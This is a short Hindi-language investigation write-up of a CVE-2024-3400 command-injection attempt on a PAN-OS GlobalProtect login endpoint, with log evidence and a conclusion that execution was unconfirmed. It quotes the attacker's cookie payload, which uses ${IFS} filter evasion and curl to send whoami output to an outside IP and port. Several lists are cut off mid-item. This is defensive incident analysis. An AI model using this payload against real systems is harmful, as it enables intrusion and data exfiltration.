
PAN-OS CVE-2024-3400 कमांड इंजेक्शन प्रयास की जांच, जिसमें लॉग साक्ष्य के आधार पर पेलोड डिलीवरी, आंतरिक प्रोसेसिंग और निष्पादन सत्यापन का विश्लेषण किया गया है।
यह प्रोजेक्ट PAN-OS GlobalProtect सेवा को लक्षित करने वाले CVE-2024-3400 कमांड इंजेक्शन प्रयास की जांच का दस्तावेजीकरण करता है।
लक्ष्य यह निर्धारित करना था:
एक गंभीर अलर्ट ट्रिगर हुआ जो संभावित शोषण प्रयास का संकेत देता है।

अनुरोध में एक क्राफ्टेड कुकी है:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

${IFS} स्पेस फ़िल्टरिंग को बायपास करता हैwhoami सिस्टम पहचान प्राप्त करने का प्रयास करता हैcurl आउटबाउंड संचार का प्रयास करता हैयह एक कमांड इंजेक्शन पेलोड है
Nginx लॉग पुष्टि करते हैं कि अनुरोध सर्वर तक पहुंचा:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl

दुर्भावनापूर्ण अनुरोध स्वीकार और संसाधित किया गया।
सिस्टम लॉग दिखाते हैं कि पेलोड आंतरिक लॉजिक तक पहुंचा:

dt_curl) में एम्बेड किया गया थाहालांकि:
DNS लुकअप विफल → आउटबाउंड विफल
हमलावर आईपी:

यह बाहरी हमलावर उत्पत्ति की पुष्टि करता है।
हमले से पहले कई आईपी ने सिस्टम के साथ इंटरैक्ट किया:

केवल 144.172.79.92 सीधे शोषण से जुड़ा है।
यह एक वास्तविक कमांड इंजेक्शन प्रयास था।
हमलावर सफलतापूर्वक:
हालांकि:
कोई पुष्टि किया गया निष्पादन या सिस्टम से छेड़छाड़ नहीं है
कमांड इंजेक्शन प्रयास
पेलोड संसाधित - कोई पुष्टि निष्पादन या प्रभाव नहीं